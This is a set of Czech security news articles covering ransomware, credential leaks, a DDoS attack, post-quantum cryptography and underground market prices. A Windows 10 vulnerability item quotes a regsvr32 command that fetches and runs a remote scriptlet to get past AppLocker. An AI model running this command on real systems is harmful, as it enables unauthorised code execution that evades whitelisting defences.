Podívejte se, jak to vypadá ve slovenské centrále společnosti ESET zaměřené na IT bezpečnost
Na co si dát pozor, abyste nepřišli o data na Windows, OS X nebo Androidu?
Největším trendem je ransomware
ESET: útočníci používají stále více druhů zranitelností
Společnost ESET založenou v roce 1992 (reálně už zakladatelé vyvíjeli produkt od roku 1987) asi v našich končinách netřeba díky produktu NOD32 nebo Smart Security příliš představovat, stejně jako například konkurenční Avast nebo AVG. ESET je stále soukromou společností, ale daří se jí růst po celém světě.
Momentálně už má téměř 1 200 zaměstnanců, třetina z nich přitom tvoří inženýry. Software pro koncové uživatele i firmy je distribuován po celém světě a s tím souvisí i šíře podpory a získaná data. Jak to vypadá přímo v centrále ESETu, jaké jsou trendy a další spoustu zajímavostí, to se díky reportáži dozvíte v článku.
NOD: Nemocnice na Okraji Disku
Trochu vtipným začátkem je původ značky prvního produktu NOD, který vycházel z tehdy populárního seriálu „Nemocnice na kraji města“. Protože původní tvůrci viděli jasnou spojitost s viry, se kterými se musí potýkat i živé organismy.
ESET se může pochlubit velkou spoustou ocenění v mnoha testech antivirů a bezpečnostního softwaru po celém světě, i když je konkurence v této oblasti poměrně velká. Podle IDC je ESET pětkou v celosvětovém srovnání, ale třeba v Japonsku je ESET nejoblíbenějším řešením a tvoří jeden z největších trhů. Software používá přibližně 100 milionů uživatelů, ale pokud jde o rozdělení mezi koncovými řešeními a firemními, je to přibližně 50 na 50.
Počet zaměstnanců ESETu se v rámci celého světa dostane brzy na k 1 200, třetina tvoří R&D
Pokud jde o vývoj, ESET má týmy u nás v Praze a Jablonci nad Nisou, několik dalších pak i v ostatních zemích. Ve všech zemích kde je ESET k dispozici jde ale hlavě o distributory. Zástupci se vyjádřili i k problému dostupnosti mladých „mozků“, které je stále těžké získat. Obory zaměřené na kyberbezpečnost teprve začínají a po letech ve školách je situace na trhu stejně zcela jiná. Realitou je tak většinou jediné řešení - je nutné si nadané studenty „vychovat“.
Houston aneb hlavní kontrolní centrum
Vývoj antiviru se dělí na dvě části – JAK detekovat (jádro) a CO (viruslab). Detekce se točí kolem velkého množství vzorků virů pro zlepšení přesnosti rozpoznání i s možností univerzálního použití (už nejde o hashe jako v historii). Cílem je, aby bylo možné signaturou pokrýt desítky tisíc virů ze stejné třídy, ale zároveň aby nedocházelo k falešné detekci.
Houston - centrální místnost
Denně na servery ESET chodí 300 tisíc unikátních souborů, které ještě nikdy předtím nebyly rozpoznané a dále se automaticky zpracovávají. Tvůrci škodlivých programů totiž často používají právě polymorfismus, který automaticky generuje obrovská kvanta verzí souborů (virů) které se liší a nějaký jednoduchý systém rozpoznání pomocí hashů tak už není možný. Jádro malwaru zůstává většinou zachované nebo se v rámci verzí mění velmi málo, ale co se mění hodně, jsou různé „ochranné vrstvy“ binárních souborů.
Hlavní obrazovky v „Houstenu“ ukazují detekce malwaru na jednotlivých místech planety, kde uživatelé zároveň používají ESET. Čím červenější, tím větší počet
V rámci viruslabů mezi sebou jednotlivé společnosti spolupracují, konkurence je hlavně v technologii a marketingu. Po automatickém zpracovávání se do zajímavých souborů a zkoumání pouští i lidští analytici, kteří mají k dispozici dva počítače – jeden pro běžnou práci napojený na firemní síť a druhý počítač, který je na oddělené síti a může se na něm infikovaný soubor pouštět pro sledování jeho chování v reálném čase. Zkoumání může probíhat klidně i hodiny či dny, pokud jde o podrobnější vyšetřování většího nebezpečí či útoku, tak i měsíce.
Karel JavĹŻrek
Zvětšit video
Masivní nástup ransomware na desktopu i Androidu
Ransomware je druh malwaru, který různým způsobem blokuje přístup k zařízení nebo k vašim datům a pro odemknutí vyžaduje různě vysoké výkupné, které musíte zaplatit. Moderní ransomware používá i techniky pro urychlení zaplacení, například časový odpočet, po kterém odmaže tisíc souborů a podobně. Některé už jsou vychytané na takové úrovni, že po infekci uživatel nějakou dobu nic nepozná, potichu vyčkávají a objeví se například až po týdnu a podobně.
Často se využívá sociálního hackingu a cílem je přesvědčit uživatele, aby souboru důvěřoval
Nejhorším problémem je, že propracovaný malware dokáže simulovat na Windows i na Androidu například přihlašovací obrazovky, díky čemuž dokáže donutit uživatele zadat administrátorské heslo do falešného pole a tak ho získat. Vzhledem k tomu, že ransomware soubory zašifruje nebo přístup do systému zahesluje, takřka neexistuje systém „vyčištění“. I když některé starší lze už dnes odšifrovat, moderní už používají silné šifry, takže zašifrované soubory nelze rozšifrovat.
Ukázky ransomwaru a požadavků na výkupné pro dešifrování dat
Uživateli tak nezbývá než zaplatit nebo přijít o data. Tvůrci ransomware díky tomu získávají obrovské množství peněz, což jim umožňuje ještě dále vylepšovat tento typ malwaru a celého systému. Už se dokonce objevují i ransomware nejen s návodem, ale i podporou, která vám poradí, jak pomocí bitcoinu zaplatit a získat dešifrovací klíč. Vše je pochopitelně řešené přes TOR a darknet.
Tvůrcům ransomwaru nechybí ani kreativita a klidně si zahrají hru, kdy vám smažou tisíc souborů za 24 hodin nebo po každém restartu počítače
Podle statistik už jedna z pěti organizací zažila útok pomocí ransomware, problém ale je, že se většinou vše tají, protože by to znamenalo ztrátu reputace, takže často raději zaplatí. Útočníci tak z tohoto přístupu začínají mít skvělý byznys, protože některý ransomware má schopnost šifrovat i data na vzdálených discích, zálohách a dalších zařízení na síti a v takovém případě firmě nezbývá nic jiného, než zaplatit. Výsledek je přitom nejistý, ani poté totiž nemají jistotu, že dešifrovací klíč dostanou a útočník může klidně požadovat ještě větší výkupné.
Jak se vyvarovat infekci?
Mezi hlavní kanály, jak se malware dostane na počítač, patří stažení aplikací z internetových stránek, stažení infikovaných aplikacích z „oficiálních“ webů známých aplikací, infikovaná příloha v emailu a trojan, který dodatečně stáhne škodlivý soubor. Samostatnou kapitolou je pak ruční vzdálená instalace přes vzdálenou plochu na daný počítač.
Základ tak je nestahovat nejen aplikace „třetích“ stran do operačních systémů, ale také si dát pozor i na ty, které se tváří jako oficiální. Jeden z případů ukázal, že útočníci vytvořili duplicitní web na stažení běžně používaného zdarma dostupného softwaru, přičemž po kliknutí na odkaz se většinou začal stahovat oficiální soubor. Pro počítače s vybranou ip adresou však došlo ke stažení upravené infikované verze, která se však tvářila zcela normálně a uživatel nic nepoznal ani po instalaci.
KeRanger se dostal do OS X přes infikovanou aplikaci Transmission přímo na oficiálních stránkách, protože měl i legitimní vývojářský certifikát. Došlo tak ke třem úspěšným podvodům v jednom až k finální instalaci na počítač uživatele
V případě desktopu to platí pro Windows i pro OS X. Na Androidu se rovněž vyvarujte stahování a instalací aplikací třetích stran, vždy používejte pouze oficiální obchody - App Store, Play Store, Windows Store a kontrolujte recenze, zda nejsou podezřele negativní.
Aktualizujte vše, zálohujte vše a používejte antivirus
Dalším problémem, který se rozmáhá, je že záškodníci dokáží do počítače nejdříve dostat neškodný program a s kódem, který žádný antivirus nedetekuje, protože nic škodlivého nedělá.
Avšak i taková aplikace může například prohledat systém a zjistit slabinu například v neaktualizované verzi Acrobat Readeru a podobně, dodatečně získá zvýšená práva a zajistí funkční malware skrze tuto díru. Proti tomuto se nelze ochránit žádnou databází a detekcí, proto moderní antiviry prohledávají počítač na programy, které jsou staré a neaktualizované a jsou tak potenciálním nebezpečím.
Další důležitou částí je zálohování, ideálně velmi často a v nejlepším případě do offline zálohy, která tak nemůže být zašifrovaná pomocí ransomware. Třetí základní radou je pochopitelně používání antiviru nebo podobného bezpečnostního řešení.
Ruský hacker dal k volně dispozici 232 milionů hesel k e-mailům
5.5.2016 Hacking
Dnes, Jan Vítek, aktualitaAnonymní ruský hacker, který si sám říká "the Collector" dal volně k dispozici celou svou databázi čítající 232 milionů údajů o e-mailových účtech, a to včetně hesel. Ohroženi se mohou cítit především uživatelé Mail.ru, ale také Yahoo, Hotmail či Gmail.
Nicméně situace nebude tak vážná, jak se může na první pohled jevit. Mladý sběratel dal k dispozici data, která by v ideálním případě (jak pro koho) mohla být využita pro přístup k 232 milionům unikátních e-mailových účtů na různých serverech a databáze obsahuje celkem 1,17 miliardy záznamů. Původně za tato data chtěl jen 50 rublů, ale nakonec se rozhodl, že mu budou stačit "lajky" na jeho sociálním účtu a vedle nich se dočkal také slov chvály.
K datům se tak pochopitelně mohli snadno dostat i lidé z firmy Holden Security LLC starající se o zabezpečení, dle nichž se v databázi nachází přes 57 milionů přihlašovacích údajů k účtům na Mail.ru (tato služba má aktuálně 64 milionů uživatelů), dále 40 milionů na Yahoo Mail, 33 milionů na Microsoft Hotmail a 24 milionů na Gmail. Je ale otázka, do jaké míry je "the Collector" hacker a do jaké míry bychom ho mohli označit jen za nadšence, který jen rád sbírá takové údaje. Firma totiž oznámila, že přinejmenším 85 procent z databáze jsou již dříve zveřejněná data, a tak je na této kolekci pozoruhodné především to, že jde o největší databázi svého druhu, kterou dal volně k dispozici pouze jednotlivec.
Společnost Holden Security LLC se specializuje na kyberzločiny ve východní Evropě a sama říká, že s hackery nevyjednává tak, aby získala jejich data za odměnu. Zde to ale udělat mohla, neboť mladý Rus získal pouze několik palců nahoru. K této záležitosti se také vyjádřili zástupci serveru Mail.ru a Microsoftu, zatímco Yahoo a Google zatím mlčí.
Mail.ru vzkázal svým uživatelům, že uvolněné informace zkoumá a pak bude případně varovat své uživatele, kteří by mohli být ohroženi. Dosud totiž nebyla nalezena žádná kombinace jména a hesla, která by fungovala. Microsoft se zase slovy svého mluvčího vyjádřil prostě tak, že podobné úniky jsou bohužel realita. Microsoft využívá jistá bezpečnostní opatření, která mají za úkol detekovat nestandardní využití účtu a v takovém případě si server od přihlašujícího se uživatle vyžádá další informace, aby ověřil jeho identitu.
Z 232 milionů záznamů tu jsou ale 4 miliony, které ještě nikdy dříve neunikly, a právě na ty se tak nyní zaměřují bezpečnostní firmy a provozovatelé serverů. Nutno poznamenat, že útočníkům jejich práci často ulehčují samotní uživatelé. Když v roce 2013 uniklo nějakých 152 milionů jmen a hesel z firmy Adobe, která je ukládala pomocí formátu Data Encryption Standard (DES), objevilo se, že pozoruhodně velké množství lidí si vybralo jako heslo "123456" či jinou jednoduchou posloupnost, pak bylo populární "password" nebo "qwerty".
Co ale může udělat samotný uživatel, aby zjistil, zda jeho přihlašovací údaje mohly být ukradeny? Může využít třeba databázi na adrese haveibeenpwned.com, kde stále jednoznačně "vede" společnost Adobe s výše zmíněnými 152 miliony přihlašovacích údajů.
Hackeři zaútočili na web řecké centrální banky. Chystají se na další banky ve světě
5.5.2016 Hacking
Počítačoví piráti napojení na skupinu Anonymous vyřadili z provozu internetovou stránku řecké centrální banky. Jde podle nich o první ze světových centrálních bank, na které hodlají během měsíce zaútočit. Informoval o tom ve středu zpravodajský server CNN.
Web řecké centrální banky v úterý na několik minut spadl, než se jej personálu banky podařilo opět obnovit.
Poradce banky pro styk s veřejností Spyros Frangos řekl CNN, že žádné dokumenty nebyly ukradeny ani zničeny. Banka při útoku nepřišla o žádné peníze.
Útok byl typu DDOS, tedy odepření služby provedené distribuovaným útokem. Probíhá tak, že směrem k napadanému serveru je vysláno obrovské množství požadavků. K serveru, pokud přímo nezkolabuje, se pak nemohou dostat legitimní uživatelé.
CNN napsal, že útok byl relativně slabý. Hackeři ovšem na serveru YouTube uvedli, že si vzali na mušku globální finanční systém, který je podle nich "tyranskou institucí".
Hodlají prý zaútočit i na weby jiných centrálních bank z celého světa. Kampaň, kterou pojmenovali Operace Ikaros, prý potrvá 30 dní.
Skupina Anonymous se v uplynulých letech rozštěpila. Její název nyní používá mnoho hackerských skupin, které navzájem nemusí být nijak propojené. Inkriminované video na internetu zveřejnila okrajová přidružená skupina.
Klasické šifrování už nestačí, kvantové počítače jej rozcupují
4.5.2016 Šifrování
Není tajemstvím, že mnoho z dnes užívaných metod šifrování by ve světě s kvantovými počítači, jejichž masovější nasazení se blíží, bylo zcela nepoužitelných. NIST, respektovaná organizace z oblasti standardů a technologií, hledá, jak z tohoto problému ven.
Právě NIST (National Institute of Standards and Technology) nedávno vydal zprávu, jejímž hlavním tématem byly šifrovací standardy v kvantovém světě. Zpráva naznačuje možnou dlouhodobou strategii, která by se problému vyhnula ještě předtím, než vůbec nastane.
„V poslední době šlo na kvantové počítače mnoho prostředků určených pro výzkum, a každý, od velkých počítačových společností přes vlády, chtějí, aby jejich šifrovací alhoritmy byly, jak my říkáme, ‘kvantově odolné,‘“ vysvětluje matematik NISTu Dustin Moody. „Takže až někdo postaví první kvantový počítač velkého rozsahu, chceme už mít k dispozici algoritmy, které se neprolomí.“
Současná kryptografie se často spoléhá na techniku matematického rozkladu velkých čísel k zajištění bezpečnosti, ale vědci z MIT a rakouské Univerzity Innsbruck nedávno představili, čemu říkají první pětiatomový kvantový počítač, schopný takové šifrovací metody prolomit.
Zatímco tradiční počítače operují s jedničkami a nulami, kvantové počítače se spoléhají na kvantové bity, tzv. „qubity,“ které mohou být zároveň 0 i 1 – tedy ve stavu, kterému říkáme superpozice. A superpozice slibuje obrovskou efektivitu a navýšení výkonu oproti současným počítačům.
Jedno z doporučení ve zprávě NISTu hovoří o tom, že společnosti by se měly soustředit na „kryptografickou obratnost,“ tedy schopnost rychle přejít na jiný druh šifrování -- takový, který bude bezpečnější. Vytvořit tyto bezpečné algoritmy je pak dlouhodobým cílem.
Za účelem dosažení tohoto cíle se vypíše soutěž, v níž členové veřejnosti navrhnou a otestují slibné nové šifrovací metody. Podobná soutěž se přitom už dříve osvědčila – vedla např. k vývoji SHA-3 hashovacích funkcí, používaných pro autentizaci digitálních zpráv. NIST plánuje zahájit novou soutěž během několika málo měsíců.
„Bude to dlouhý proces zahrnující veřejné prověřování algoritmů, odolných vůči kvantové technologii,“ říká Moody. „A nečekáme, že najdeme jen jednoho vítěze.“
Hned několik z dnes běžně fungujících bezpečnostních mechanismů by mohlo být prolomeno kvantovým počítačem, a to např. veřejné šifrovací klíče nebo digitální podpisy, takže bude třeba vytvořit vícero nových alternativ.
Ačkoli jsou kvantové počítače a s nimi související bezpečnostní hrozba ještě vzdálená budoucnost, NIST nehodlá ztrácet čas.
„Historicky trvalo dlouho, než se rozhodlo, že je šifrovací systém dobrý, a než jsme ho zařadili jako standard do produktů na trhu – může to trvat 10 i 20 let,“ pokračuje Moody. „Společnosti začaly reagovat na nové změny, a my cítíme, že je čas začít na tom pracovat.“
Android opravuje šest kritických chyb
3.5.2016 Zranitelnosti
Google jako tradičně na začátku měsíce vydal souhrn oprav pro operační systém Android, nově pod názvem Android Security Bulletin namísto Nexus Security Bulletin. Lehce se také změnila klasifikace závažnosti chyb. Tentokrát bylo opraveno šest kritických chyb, konkrétně v kernelu, ovladači Nvidia, ovladačích Qualcommu nebo v mediaserveru.
Partneři, obvykle výrobci zařízení s Androidem, byli o chybách informováni už s měsíčním předstihem, aby mohli připravovat opravy. Za jak dlouho a v jaké míře se k uživatelům dostanou, ale velmi záleží na konkrétním výrobci. Řada Nexus dostává aktualizaci souběžně s vydáním bulletinu. Google nemá zprávy o zneužívání žádné z chyb v praxi.
Hackeři napadli herní servery Minecraftu, do oběhu se dostaly údaje sedmi milionů hráčů
3.5.2016 Hacking
Lifeboat je oblíbená služba, která sdružuje několik typů herních serverů pro populární Minecraft. Už na začátku ledna se však útočníci dostali do databáze uživatelských účtů, čímž získali údaje sedmi milionů registrovaných uživatelů. Provozovatelé potvrdili únik údajů až nyní pro Motherboard a svoje uživatele o možných rizicích neinformovali vůbec.
S informací přišel Troy Hunt, který provozuje web Have I Been Pwned, na kterém si můžete ověřit, zda je váš e-mail součástí některého z balíků uniklých dat. Podle něj se útočníci dostali k e-mailovým adresám, ale také slabě šifrovaným heslům, u níž je velká pravděpodobnost snadného dešifrování.
Provozovatelé služby o úniku dat věděli ihned, rozhodli se však pro nezodpovědné řešení, kdy pouze odeslali uživatelům e-mail s možností resetovat svoje heslo. Důvod jim však sdělen nebyl a efektivita tedy byla pravděpodobně velmi nízká. Proč se rozhodli pro toto řešení, zodpověděl pro Motherboard jeden ze zástupců společnosti - „nechtěli útočníkům prozradit, že o útoku již ví“.
Internetem kolují tisíce virů, stále více jich cílí na chytré telefony a tablety
2.5.2016 Hrozby
V současnosti internetem koluje několik tisíc virů. Při jejich šíření se přitom počítačoví piráti stále častěji zaměřují na mobilní zařízení, tedy na smartphony a tablety. Vyplývá to z analýzy bezpečnostní společnosti Check Point.
„V průběhu března jsme identifikovali více než 1300 různých malwarových rodin, což je drobný pokles oproti předchozímu měsíci. To ovšem neznamená, že by byl březen bezpečnějším měsícem, jen to ukazuje na skutečnost, že kyberzločinci nemusí vyvíjet zcela nový malware pro útočné aktivity,“ uvedl David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Označení malwarová rodina výzkumníci používají pro pojmenování různých škodlivých kódů, které však mají stejný základ. Například vyděračské viry z rodiny ransomware, které zašifrují data na pevném disku a za jejich odemčení požadují výkupné, tvoří pouze jednu „rodinu“. Různě upravených ransomwarů přitom kolují internetem stovky.
Rodin je tedy skutečně „pouze“ 1300, ve skutečnosti se ale aktuální hrozby počítají na tisíce. Klidně i jen drobnou úpravou části zdrojového kódu si totiž kyberzločinci zpravidla zajistí, že již nahlášená a známá počítačová hrozba je najednou úplně nová – většina antivirů je pak na takové hrozby minimálně v prvních dnech jejich rozšíření krátká.
Nárůst mobilních hrozeb
Patrný je nárůst mobilních hrozeb, škodlivé kódy se tedy častěji zaměřují na chytré telefony a tablety. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl Řeháček s tím, že bezpečnostním expertům v současnosti dělá velké vrásky na čele především hrozba zvaná HummingBad. Právě ta se dostala mezi deset nejrozšířenějších virových nákaz.
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.
„Instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako jsou například instalace keyloggerů, krádeže přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat,“ konstatoval Řeháček.
Jinými slovy počítačoví piráti převezmou nad napadeným přístrojem naprostou kontrolu. Mohou jen vyčkávat a sledovat aktivitu uživatele, stejně tak ale dovedou odchytávat zprávy týkající se internetového bankovnictví. Teoreticky tedy mohou uživatele připravit o peníze.
Zaměřují se na Android
Také další dvě hrozby, které patřily v březnu k těm nejrozšířenějším, cílily na chytré telefony a počítačové tablety. Konkrétně na modely s operačním systémem Android.
Jedním z nich je například AndroRAT, který se dokáže navázat na nějakou legitimní aplikaci. Do mobilního zařízení se tak často dostane bez vědomí uživatele. Ten si jej stáhne zpravidla z neoficiálních internetových obchodů s nějakým jiným programem. Pak už nic nebrání útočníkům, aby převzali plnou kontrolu nad napadeným strojem.
Na pozoru by se měli uživatelé mít i před hrozbou zvanou Iop. „Tento malware instaluje aplikace a zobrazuje nadměrné množství reklam. Množství reklamy a nainstalovaných aplikací neumožňuje uživateli používat přístroj jako obvykle,“ uzavřel Řeháček.
Na Android se počítačoví piráti nezaměřují náhodou. Tato mobilní platforma je aktuálně nejrozšířenější, a tak mají kyberzločinci větší šance, že budou při útocích úspěšní.
Windows 10 mají kritickou zranitelnost
2.5.2016 Zranitelnosti
V operačním systému Windows 10 byla nalezena nová kritická zranitelnost. Kyberzločinci ji mohou zneužít k tomu, aby uživateli podstrčili prakticky libovolný škodlivý kód. Upozornil na to server BRG.
Chybu odhalil bezpečnostní výzkumník Casey Smith. Trhlina se týká programu s názvem Regsvr32, respektive Regsvr64 v případě 64bitové verze systému. Jde v podstatě o nástroj příkazového řádku, který může registrovat různé ovládací prvky v operačním systému.
Kvůli chybě může být zmiňovaný program zneužit ke spuštění prakticky libovolného kódu na cizím počítači. Útočník k tomu nepotřebuje ani práva administrátora. Jediné, co musí udělat, je donutit uživatele spustit v jeho počítači předem připravený škodlivý kód. Ten se může šířit například prostřednictvím nevyžádaných e-mailů.
Kritickou chybu mohou obsahovat i starší verze Windows.
Podle Smithe je problém v tom, že kvůli chybě není nezvaný návštěvník rozpoznán aplikací AppLocker. Ta běžně slouží k rozeznávání důvěryhodných zdrojů ke spouštění aplikací. V praxi to tedy znamená, že na uživatele nevyskočí ani žádná hláška, že by si měl na danou instalaci dát pozor.
Regsvr32 je nedílnou součástí operačního systému Windows už od dob verze XP. Výzkumník však chybu identifikoval zatím pouze v nejnovějších desítkách. Zda ji obsahují také starší verze operačního systému od amerického softwarového gigantu, zatím není jasné.
Záplata zatím chybí
Microsoft zatím pro kritickou zranitelnost nevydal žádnou bezpečností záplatu. Uživatelé sice mohou program Regsvr32 (respektive Regsvr64) zablokovat, pouštět do toho by se nicméně neměli méně zkušení uživatelé.
Samozřejmě je také velmi vhodné myslet na to, na co uživatelé během práce na počítači klikají. Úplně ignorovat by měli nevyžádané e-maily a podezřelé zprávy například na sociálních sítích. Stejně jako u většiny podobných chyb ani u té nové totiž kyberzločinci nic nezmůžou bez přičinění samotného uživatele.
Hacknout něčí účet na Gmailu? Tak to bude 130 dolarů
2.5.2016 Zdroj: Lupa.cz Hacking
Studie Underground Hacker Markets od Dell SecureWorks ukazuje, že hackeři vlastně nejsou až tak drazí.
Dostat se do účtu na Gmailu, Yahoo či Hotmailu vás bude stát 129 dolarů. Do firemního e-mailového účtu to ale bude za 500 dolarů. Ruské e-mailové účty získáte za 65 až 103 dolarů. Získat přístup na něčí Facebook či Twitter je také za 129 dolarů, ale pokud jde o účty na Vkontakte, tak cena stoupne a budete si muset připravit 194 dolarů, píše ve své studii bezpečnostní firma Dell SecureWorks.
Za podobné ceny můžete mít falešný řidičák v USA, Velké Británii, Německu či Izraeli. Kompletní novou identitu si můžete pořídit za 90 dolarů a získáte fotokopii řidičáku, karty sociálního pojištění a faktury dokladující, že platíte za byt. Podstatně dražší je ale pas, ten z USA stojí mezi 3000 až 10 tisíci dolary.
Kreditní karty jsou oproti tomu levné, VISA či MasterCard pocházející z USA přijdou na sedm dolarů, Premium American Express či Premium Discovery na dolarů třicet.
Velmi levné jsou i trojské koně pro vzdálený přístup (RAT), vyjdou na 5 až 10 dolarů, Angler Exploit Kit ale už 100 až 135 dolarů. Levný může být i DDoS, ceny začínají na pěti dolarech (za hodinu), ale mohou být i přes 500 dolarů. Na vyzkoušenou vám navíc nabídnou pět až deset minut zdarma.
Kompletní studii Underground Hacker Markets (PDF) si samozřejmě můžete prostudovat sami. Zjistíte tam navíc i to, že v řadě případů ceny poměrně ostře klesají.
Chyba ve Windows 10 umožňuje spustit aplikaci bez vědomí uživatele
2.5.2016 Zdroj: Lupa.cz Zranitelnosti
Těžko si představit, jak je možné, že v nejnovějších Windows můžete na dálku spustit jakoukoliv aplikaci bez vědomí uživatele.
Pokud na počítači s Windows 10 použijete Regsvr32, abyste spustili soubor uložený na vzdáleném systému, podaří se vám to. Bez vědomí uživatele, bez varování před instalací a bude ignorován i případný blacklist (AppLocker). Není potřeba mít práva správce ani nic dalšího. Jediná obrana zatím spočívá v zablokování Regsvr32 na úrovni firewallu (a také Regsvr64).
Důležité je, abyste tuhle zranitelnost pochopili správně – neznamená, že někdo může na dálku na vašem počítači něco spustit. Znamená, že pokud vás (uživatele) někdo přesvědčí ke kliknutí na něco nevhodného, může tím dojít ke spuštění a instalaci čehokoliv, aniž byste si uvědomili, že k něčemu takovému došlo.
Podmínkou samozřejmě je, že něco spustíte (což uživatelé dělají rádi), a také to, že bude dostupný vzdálený systém, který se postará o dodání skriptu. Ten už se pak postará o zbytek.
Podrobnosti přímo od objevitele chyby najdete v Bypass Application Whitelisting Script Protections – Regsvr32.exe & COM Scriptlets (.sct files) a v zásadě stačí použít něco jako „regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll“, ale až tak jednoduché to samozřejmě není. Kompletní proof of concept prozradí více.
Vyčíslete si finanční hodnotu IT rizik
1.5.2016 Rizika
Manažeři zabezpečení běžně musejí dělat těžká rozhodnutí o tom, jaká rizika snižovat, jaká zcela eliminovat nebo převést a konečně která jen akceptovat. I rozpočet na zabezpečení má totiž své meze.
Přijímání rozhodnutí ohledně rizik vyžaduje důkladné chápání dopadu těchto opatření, znalost dostupných ochran a někdy také odvahu učinit těžké rozhodnutí. Cílem tohoto článku je poskytnout rady, které by bezpečnostním manažerům mohly pomoci při tomto obtížném rozhodování o rizicích.
Stanovte dopady
Pokud způsob stanovení rizika není v souladu se samotným podnikáním vaší firmy, potom na tom bude metoda, jak se rizika ošetří, obdobně. Jestliže stále určujete riziko podle staré kvalitativní stupnice „nízké, střední, vysoké“, jak potom můžete posoudit, zda konečné rozhodnutí odpovídají potřebám vaší firmy?
Jak popíšete nejvyššímu vedení nebo členům představenstva, jaký dopad mohou mít příslušná rizika na firmu, a jak odůvodníte investice potřebné pro zabezpečení, abyste je přesvědčili o přínosu přijetí opatření?
Když dostanete od vedení otázku na návratnost investic (ROI) do zabezpečení, jak na ni odpovíte?
Chcete-li se vyzbrojit odpověďmi na tyto otázky, musíte nejprve správně stanovit dopad, jaký by mělo dané riziko na vaši firmu. A chcete-li pochopit dopad, budete muset vědět, jaká aktiva příslušná hrozba postihne (v případě, že událost skutečně nastane), jak rozsáhlé postižení bude a jaká bude souhrnná obchodní hodnota zasažených aktiv.
Při výpočtu hodnoty pro firmu je důležité zvážit informační aktiva stejně jako aktiva infrastruktury. Hodnota vašich informačních aktiv ale nemusí být tak zřejmá jako u aktiv infrastruktury.
Nedávná zpráva společnosti Forrester Research to částečně vysvětluje slovy: „...hodnota informací je procento současného a budoucího obratu, které tyto informace vytvoří, minus přímé a nepřímé náklady na tvorbu, správu a jejich ochranu.“
Pokud se dané riziko stane skutečností, bude dopad na vaši firmu kombinací nákladů spojených s událostí samotnou plus ztracený obrat v důsledku nedostupnosti takových aktiv.
Ponemon Institute nabízí několik užitečných průvodců jako například náklady na vyzrazení osobních dat (například citlivé osobní údaje) podle záznamů. Využijte tyto průvodce, ale vypočítejte také obrat, který vaše firma ztratí v případě nedostupnosti zasažených aktiv.
Při vyjadřování hodnoty v souvislosti s rizikem tuto hodnotu vyčíslete v penězích. Když to uděláte, budete moci porovnat obchodní hodnotu s finančním vyjádřením rizika pomocí stejného měřítka.
To je podstata vyčíslení finanční hodnoty rizika. Vyjádření finanční hodnoty rizik tímto způsobem umožní přizpůsobit bezpečnostní program podnikovým cílům.
Firmy existují proto, aby vydělávaly peníze, takže vyčíslení hodnoty rizik v podobě peněz vám pomůže poměřovat je podle jejich dopadu na vši organizaci.
Nejvyšší vedení chápe ekonomické aspekty mnohem lépe než bezpečnostní rizika. Když mu vysvětlíte své důvody pro zmírnění (či nezmírnění) daného rizika, bude schopné udělat informovanější rozhodnutí, protože to bude v kontextu, kterému rozumí.
Vyjádření finanční hodnoty klíčových rizik
Proces vyjádření finanční hodnoty rizika vyžaduje důkladné pochopení, a to asi nebudete chtít dělat pro každý existující systém a síťové bezpečnostní riziko. Místo toho se zaměřte jen na vyčíslení finanční hodnoty rizik s nejvyšší hodnotou, jako jsou hrozby, které by mohly zasáhnout kritická podniková aktiva a například ovlivnit produktivitu firmy.
K určení peněžní hodnoty rizika je nutné pochopit pravděpodobnost výskytu rizika a také dopad na vaši firmu.
Při určování pravděpodobnosti se zaměřte na konkrétní opatření, která vaše organizace používá ke snížení dopadů daného rizika, versus opatření, jež považujete za potřebné zavést ke zmírnění této hrozby.
Vytvořením poměru již zavedených opatření a opatření, která je třeba ke zmírnění rizika zavést, se blížíme k vyjádření pravděpodobnosti výskytu.
Je ale důležité si uvědomit, že se zaměřujeme jen na konkrétní opatření, která řeší dané riziko (rozhodně nemáme na mysli všechna opatření v rámci vaší organizace). V různých situacích mohou být některá opatření cennější než jiná, takže přiřazujte každému z nich váhu podle zvažovaného scénáře.
Když toto cvičení pak budete později dělat s cílem vyčíslit finanční hodnotu dalších rizik, uvědomte si, že se jak příslušná opatření, tak i jejich odpovídající váhy mohou změnit.
Řekněme, že rizikem, u kterého vyčíslujete hodnotu, je „ochrana před únikem dat“ z vašeho podnikového systému ERP (v tomto příkladu tedy kritická podniková aplikace). Našli jste například devět konkrétních opatření, u kterých se domníváte, že uspokojivě řeší riziko úniku dat.
Každému z nich přiřadíte váhu 1–10 (10 označuje nejvyšší hodnotu). Při hodnocení opatření určíte, které z nich už používáte a které nikoliv (viz tabulku 1)
Tabulka 1: Opatření pro zamezení úniku dat z ERP
Zachování anonymity? S big daty spíše zbožné přání
30.4.2016 Sledování
Pro zachování anonymity osobních informací při shromažďování big dat existují účinné metody. Záleží však z velké míry na tom, jak často se využívají. A většina expertů uvádí, že to není moc často.
Jak anonymní může člověk v dnešním digitálním světě být? Nejde o skupiny hacktivistů, ale o anonymitu průměrných lidí v situaci, kdy se jimi vytvářená data shromažďují v podstatě každým – počínaje marketingem, webovými stránkami, výzkumnými pracovníky, vládními organizacemi atd.
Je shromažďování údajů pro potřeby big dat – i s odstraněním osobních údajů či zašifrováním – stále zranitelné vůči metodám zpětného ztotožnění, které identifikuje jednotlivce až do té míry, že je možné nebo už probíhá vlezlé narušování soukromí?
Nebo lze zachovat jednotlivcům bezproblematickou anonymitu v moři dat, která se používají ke zjišťování trendů, sledování šíření nemoci, určování oblastí s vysokou kriminalitou nebo k dalším záležitostem, jež zlepší hospodářský blahobyt či zdraví populace?
Je anonymita zajištěná?
Nečekejte od zástupců IT a odborníků na soukromí jednomyslnou odpověď. V této oblasti stále probíhají diskuze. Skupina na jedné straně zahrnuje autory dokumentu „Big data a inovace, náprava záznamů: deidentifikace funguje“ z června 2014, kde se uvádí, že soukromí je dostatečně podporované a média by měla přestat přehánět.
